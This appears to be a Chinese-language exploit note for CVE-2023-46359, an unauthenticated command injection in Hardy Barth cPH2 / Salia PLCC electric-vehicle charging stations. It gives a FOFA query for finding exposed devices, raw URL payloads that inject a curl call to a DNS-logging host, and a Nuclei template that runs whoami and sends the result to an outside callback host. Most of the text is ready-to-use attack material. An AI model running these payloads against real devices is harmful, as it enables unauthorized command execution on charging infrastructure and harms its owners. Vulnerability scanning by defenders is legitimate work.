# Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

## fofa
```
"Salia PLCC"
```

![](./assets/20231226203214.png)

## poc
```
/connectioncheck.php?ip=127.0.0.1%20&&%20curl%20http://dnslog.cn

/connectioncheck.php?ip=127.0.0.1%20&&%20${curl%209qa1r0.dnslog.cn}
```

![](./assets/20231226203501.png)

![](./assets/20231226203521.png)


## yaml poc
```
id: CVE-2023-46359

info:
  name: cPH2 Charging Station v1.87.0 - OS Command Injection
  author: mlec
  severity: critical
  description: |
    An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.
  remediation: Fixed in version 2.0.0
  reference:
    - https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46359
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:N/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.6
    cve-id: CVE-2023-46359
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Salia PLCC"
  tags: cve,cve2023,salia-plcc,cph2,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<b>SUCCESS</b>"
          - "127.0.0.1 && curl http://$(whoami).{{interactsh-url}}"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022068ef983fa81262636ea41ef1e73a41004e64f96e9a0bf31555de76a92984a911022100851ff91914ba0856c3e59c01d679b4f5076ed7f404cb50efe363eb43f19ec7b3:922c64590222798bb761d5b6d8e72950
```
